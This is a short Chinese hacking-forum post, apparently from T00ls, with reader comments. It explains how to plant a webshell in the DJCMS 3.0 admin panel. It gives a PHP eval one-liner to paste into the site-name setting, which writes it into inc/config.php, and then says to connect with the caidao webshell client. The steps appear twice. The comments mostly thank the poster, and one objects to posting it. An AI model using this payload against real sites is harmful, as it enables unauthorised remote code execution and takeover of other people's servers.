DJCMS 3.0后台拿shell
进入后台 在其它设置里 网站名称插入以下一句话
记住提交两次
");eval($_POST[cmd])?>
然后用菜刀连接
http://www.u.com/inc/config.php
by:xch40
记住提交两次
");eval($_POST[cmd])?>
然后用菜刀连接
http://www.u.com/inc/config.php
by:xch40
关于作者
T00ls.Com版权所有。T00ls所有原创文章未经管理团队许可,禁止一切形式的转载。
Copyright © 2008 - 2025 T00ls All Rights Reserved.
评论11次
观摩一下
本地测试后,后台程序就乱码了。。继续看看哪里的过滤问题。
mark!!
好吧 我表示我的两个站都是djcms
收下了
- -这样的东西就不要发了吧.....直接写入变异一句话到配置文件-_,
收下、、、、、
这算是提交参数的时候没有进行过滤的漏洞吗?
和DZ很类似
强烈支持原创
1943 神秘小强 本人?